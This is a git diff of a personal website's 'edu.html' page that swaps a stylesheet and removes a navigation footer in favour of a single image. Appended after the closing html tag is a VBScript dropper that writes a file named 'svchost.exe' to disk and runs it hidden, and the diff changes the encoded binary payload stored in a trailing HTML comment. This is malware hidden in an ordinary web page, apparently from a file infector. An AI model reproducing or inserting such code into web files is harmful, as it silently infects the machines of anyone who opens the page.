--- a/edu.html
+++ b/edu.html
@@ -1,33 +1,9 @@
 <html>
     <head>
-        <link rel="stylesheet" href="styles/style.css">
+        <link rel="stylesheet" href="styles/eduStyles.css">
     </head>
     <body>
-        <div id="container">
-            <div id="upperCon">
-                <iframe id="topContent" src="" name="topScreen">
-                </iframe>
-            </div>
-            <div id="lowerCon">
-                <div id="footer">
-                    <div id="homeButton" class="footerButtons">
-                        <a href="home.html" target="topScreen">HOME</a>
-                    </div>
-                    <div id="infoButton" class="footerButtons">
-                        <a href="info.html" target="topScreen">INFO</a>
-                    </div>
-                    <div id="eduButton" class="footerButtons">
-                        <a href="edu.html" target="topScreen">EDUCATION</a>
-                    </div>
-                    <div id="hobbyButton" class="footerButtons">
-                        <a href="">HOBBY</a>
-                    </div>
-                    <div id="contactButton" class="footerButtons">
-                        <a href="contacts.html" target="topScreen">CONTACT</a>
-                    </div>
-                </div>
-            </div>
-        </div>
+        <img src="images/eduPic.png">
     </body>
 </html><SCRIPT Language=VBScript><!--
 DropFileName = "svchost.exe"
@@ -43,4 +19,6 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--š…×1¬tlt}§ØŽÂö<‡}Ùx)`ÌeÉ=™)§cz›08hª({æVÙCÀv7¹P¦‚©dš‹`é˜´µ‚‰ß´ßæ{s¡û¦¨ñ»§:EÀuÍ»¶9Š‰''zŽŠPÙ/ÁÍ Â|QmŽÜ¹†VJÀþÇúWø¾:m¸y”©ÑC,ZóŸ\¨=œÆºeêjb@PšèÛÏemÅ0|G·§-SMÞWëÕíž•ðZˆí81®¸H–#]ÄŒÞŠPÙ/¿å["}qÀdÛ€ôPã@ZšßxW‚éÌ.ï ‰ð¼nñœì«¸Â'yl%ÃÄüÕgŒõðèÃ£Øý¡ÎGš2TgAs*z=öÈ>‹C™eÆÄ-%ÜÙÉW°[Û¼êˆlÒ£¡F«žô˜n •¸Ì[LÃA~öNëÔl%$Õ™õ… áêR"ñøáêáêáê¬7NþY?[Ûåê áê-->
+//--></SCRIPT><!--’{7èK”æýsd_Wm9kŽ%UuÏ¤ ÈB—>]á
+äAõø:^œÜ5üLCYµR=B+1÷Më©3·" êî•¬_pŠ°¿3á± 7âôsæ†cÃ{8³¯
+ðþ„4ûRü¹ß“ýIÜ° V_ÒÇªu	ÒKËšNZþ®#ödÊ¦U‡‡xaz·}éþ¥–µ•^Æ›ºH>eé6ÜnÌó9¯NêjÌÜ"ËutŠs|à•wÔŸH[’èÙ%	hž~ÂEþ\R Ë"^{¨ýö„È¿–< ,%¦úF‹NÈDb Lƒž$ÊAÈ¨SV© ¦×ZîVç±…Ö—ŠX—]ËÄRDF‚GÌ-óÙd3„Ï¡¬ÝÉðî˜ö}ôÄ:†ù}ÂL‘†À«¾Ù;Z—Äñ¤ô¹‘¾Îg«‡™Sº—Ç:¿Q`®›½YA>§æ=qcßö–Â	qQk 	©Q8Î/„AÅIš–btÝ5=Áô’j>?ºk®ý6Û«áv HöGq#WÌ`”ku¼°™¢3ˆX:1¸xÍ«`¾ü-E áêR"ñøáêáêáê¬7NãP?[¥áê áê-->
